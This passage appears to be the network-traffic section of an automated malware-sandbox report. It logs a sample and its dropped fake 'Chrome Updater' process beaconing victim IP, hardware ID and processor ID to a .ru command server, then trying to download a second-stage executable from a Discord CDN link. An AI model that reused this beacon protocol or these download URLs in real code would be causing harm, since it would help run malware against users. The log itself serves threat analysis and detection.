                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B%2FLR3rIjBC6EcYsW9f21TElEIWaQDeVoI9t0b3RsOlkj2THo5nhg1qbOA0LlbTRyT7mcawyXw13gPt0AsAA%2BnRpsU8Ajn2SCECk%2FXiZHgnqyc77qS00qvov5WA1He4YYKqyGcdyP"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7c33d423af3-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:10 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    148192.168.2.649871104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:10 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:10 UTC578INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:10 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eewzpFUbHJ%2B%2BhQJbbYIgPnXkiWXhDazXp1jVGlJNC0Pn03gOVCTqn0oUouSUgELB3W0fOyssq4%2FO18%2Bf9nz4f205vpIMDtEeZwKrQI4K9glLCYcsbSyCpTKKDID7e3M7BfQU2B3W"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7c6987e3886-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:10 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    149192.168.2.649872104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:10 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:10 UTC601INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:10 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GdbsK0oiTKfQYQYxo4aqqrr65Ls0khFF1ZQ3Acai8oUjZxEb6qZDBk9saRj5SdKXvm%2Blk4%2BhefSymESyWw1dmg84VFD8JOSjOrAYIwbRf%2FdnL7MXGYDZTaiq%2FF2LOM7I7wJMNgop"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7c77b1f9c1f-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:10 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    150192.168.2.649873104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:11 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:11 UTC607INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:11 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FwgS75R%2BqthugVLl2Cq7KThqETfoW1UkXP%2BcqKlMnlbkOh7dUotBL9jIt9GhrHAXRSopbMFt62nsBcS%2BYXU4kJgadMyse%2Bm9oWvLiEuQB7Jm6RkuBJg%2B9gxy%2B%2BaavaaO4Nr1UeHK"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7cafa375860-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:11 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    151192.168.2.649874162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:11 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:11 UTC1335INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:11 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c7cbb8583ad8-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 55
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:11 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=H7_wmjHnmQ9Be_Zt2z9Q_.sBuJF2Tf0ycv15bt5mG7M-1704353471-1-AWPQFZ7FzbmcEvqkm5E5sYuchYHn/T3hAFfLHu0mtcNNWZU2cqDTrYHs0e52E1g1KZA1JqzgJwacKnwpuGb4dLQ=; path=/; expires=Thu, 04-Jan-24 08:01:11 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4hm2wNTB6P8G58Aja4yvz0%2BILBgmsf28S7vGY4jAE1GS5QoWzitEJnEM%2BjPtuS94ZuenV7jaerHky0LZpRfdhsZGhP82yAZLkfaE1hkY8TM6jSC2tsCLxIqytPChE%2ByRwp%2BknQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=HLXT8wpN7LMlwHMEvpPRh6Kv1JGGQZGexafjEc.urKk-1704353471336-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:11 UTC34INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-
                                                                                    2024-01-04 07:31:11 UTC202INData Raw: 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: 8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    152192.168.2.649875162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:11 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:11 UTC1342INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:11 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c7cf3fb52078-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 53
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:11 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPpAlGdKaN1uiBpjD2ZqIMs0BtE911xE7HCoSFLPLd1NPY-8PyHba9dJDWmELy731FdKcKTHaHKjWQ
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=zwQW6xD9PaTnqMiNDXhrxKTDWiCfVI0jXJU_ipFys4I-1704353471-1-AYfrHxlr1UNJ8myt8s+OpZxs94rqilOK+CCTPGw0Us/zRayeedKj4E6ygqv3KrOVCohK969v42IbNgRsjKvikL4=; path=/; expires=Thu, 04-Jan-24 08:01:11 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HCfz1u2CUPEEkf9xQ1yiyDIkjCibDzBtyabP2CrsXU%2B7uBrw8L9OwpduWZfgPz4AF7r0RTBKa%2FexJgvEBBI2%2BEDbcNTHvBgdmRv8FIHsXmbAH2J1ovpDry%2BTfAIVa6j36V613Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=WaivKb9XSP.8l22z2vClpjBDZvFDXvZy_lnhvEIVGio-1704353471894-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:11 UTC27INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e
                                                                                    Data Ascii: <?xml version='1.0' encodin
                                                                                    2024-01-04 07:31:11 UTC209INData Raw: 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: g='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    153192.168.2.649876104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:11 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:12 UTC582INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:12 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UtYWfioFVaUD0egvxTIdMcznCi%2BkFqxbGU3dkNN6xicfX8NnCMlVbJbp3Ub8vEpStUPzvt4oa%2F1%2BJYLHApqUtv2DXd6TV7hKF6jhWHYBM2skFQCjIvKJjaQ804EU%2B0E%2Fb8stxC%2Bv"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7cf4ff13b2f-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:12 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    154192.168.2.649877104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:12 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:12 UTC572INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:12 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fDpXFfnBVTbtfFt9Z0gy39A6hFsGQhbMRsDTcLWkH3x9f9X8ZGHY9Lw4Lm43IgKDcqw8qsEliKfCUaBaDIypMJc7XNOhOajSU6p9EStV57IiajGXCht%2BzqOgAepz3cw8uRem1wLW"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7d2bae656bc-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:12 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    155192.168.2.649878104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:12 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:13 UTC599INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:13 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FglZ0AEaRj8avMfjoXHaeojjQB2NZ6IK%2FtamYJ6RRneRfGV6EgeNrSmHlM2YDXgawDXUOnjSKWTP2Nwd4pEqAS9luK9fjNvS490yC2ZFn%2F2UNXc5VT%2BRv84SyrUNkZQdR5iseAYk"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7d50e909c49-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:13 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    156192.168.2.649879104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:12 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:13 UTC599INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:13 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mRdiMYTd0rEPU7R12vl%2FCA37nGTQ3dkex9cJz%2FM5c0BpXY56jlLRrJvDHPbecybj%2Bt89rsdYAqwO9Hpd369rJY9eXbDdJcdETJaixZ3IDhyN7GOYmihNDtWWJIQuLHmXwk14BiJq"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7d71816585a-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:13 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    157192.168.2.649881162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:13 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:13 UTC1340INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:13 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c7da8b2f2030-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 55
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:13 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPpAlGdKaN1uiBpjD2ZqIMs0BtE911xE7HCoSFLPLd1NPY-8PyHba9dJDWmELy731FdKcKTHaHKjWQ
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=iVULpCiIdnVeqiL9sm8IDzcuH5.qyPNsXcwlWRPR0z4-1704353473-1-AUfsdU39KoGeGi2YbV+ymb0gfFtspAXi+qjWYC9JS+LlNVRko5wIK2KZlKgMLzJS571aHJqiahMUrusVIOUED6c=; path=/; expires=Thu, 04-Jan-24 08:01:13 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CFRDVygT73HZeMpRjBMGJGgLBuNaBc7GNxwdgQq5jlx26tZcugFmIzKn%2FGn%2BtqrF1rzQ1SdZJoVy6929fR02CmG5d1oXL5ZQMdfRYej3e3UFyxICy6Lik6Xd3f%2Fm83LDOwixjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=.xcBuab3Ud0LvhEOQ9tnAXvmrl7xuyjFSRtX3fNa5pE-1704353473706-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:13 UTC29INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d
                                                                                    Data Ascii: <?xml version='1.0' encoding=
                                                                                    2024-01-04 07:31:13 UTC207INData Raw: 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: 'UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    158192.168.2.649882162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:13 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:13 UTC1346INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:13 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c7db5dc8575e-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 35
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:13 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=wB2fDfA01gH10NYEVWS4sutI_LEtuhxsSJrWC__gaYE-1704353473-1-ARgp3o1M2KLfKk5Pi19fx7mn4qmbCchZMpFZ0UEI11oA/gQqPR49WinmlveH31htkH1tig0TEtP8cjE2A+VXFXw=; path=/; expires=Thu, 04-Jan-24 08:01:13 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=N64GiW60iZKWyYsPXl3wu55BFsMlya0g%2F6XKoU5P6e9ZF5%2FGtJnAbZ458n1rj%2F1teFt4AqS2HJmE3%2Fi9c%2FrMYFAg6tKb%2BWJnZIz35crx9tiwK8HXEMSVF6yTyWVwIZNIqG1AJw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=6GnJZhxglxhJSoOVLSpm6iT2QTNp5yXucEyKKymsgBI-1704353473843-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:13 UTC23INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63
                                                                                    Data Ascii: <?xml version='1.0' enc
